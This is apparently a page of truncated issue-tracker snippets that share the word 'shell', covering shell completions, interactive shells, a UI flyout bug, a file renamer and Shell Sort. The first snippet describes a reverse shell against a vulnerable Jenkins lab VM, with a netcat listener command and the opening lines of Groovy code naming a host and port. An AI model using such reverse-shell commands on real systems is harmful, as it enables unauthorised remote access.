-
I'm running a vulnerable vm hosting Jenkings, I have access to a CLI
and use this code to execute a reverse shell successfully with nc -lvnp 4444
```
String host="192.168.1.50";
int port=4444;
…
-
Implement a shell that aligns with shell (or, ideally, BASH).
-
Target release: Iteration 16 (Dec 6)
Status: `blocked` Pending new IA/UX treatment from decision to treat apps as artifacts
## Description
Improvements to the global nav and shell to
- simpli…
-
As we are moving toward a pretty stable set of command line options, I think it would be nice to provide completions for common shells.
If folks are interested in this I can start working on this …
-
**Is your feature request related to a problem? Please describe.**
When a custom command is specified in the config it runs it with `bash -c ""`. I'd like this shell to be interactive to be able to r…
-
`lychee_bin` already uses `clap` which means we can utilize the following crates:
- [`clap_complete`](https://crates.io/crates/clap_complete): generated the shell completions
- [`clap_mangen`](htt…
orhun updated
2 weeks ago
-
### Description
I'm not sure exactly how it is broken but the symptom seems to be that MenuItem names vanish in the Shell flyout - whether they are not there or are white on a white background I have…
-
-
I just found the great File Renamer Ultra 2000 (updated edition by you) and was more than happy to install it. It works absolutely perfectly on Windows 11, and it doesn't need the included reg file, b…
-
Shell Sort Algorithm
-------------
### Description:
Shell Sort is an optimization of Insertion Sort, where elements are sorted over increasing intervals (called gaps) rather than adjacent posi…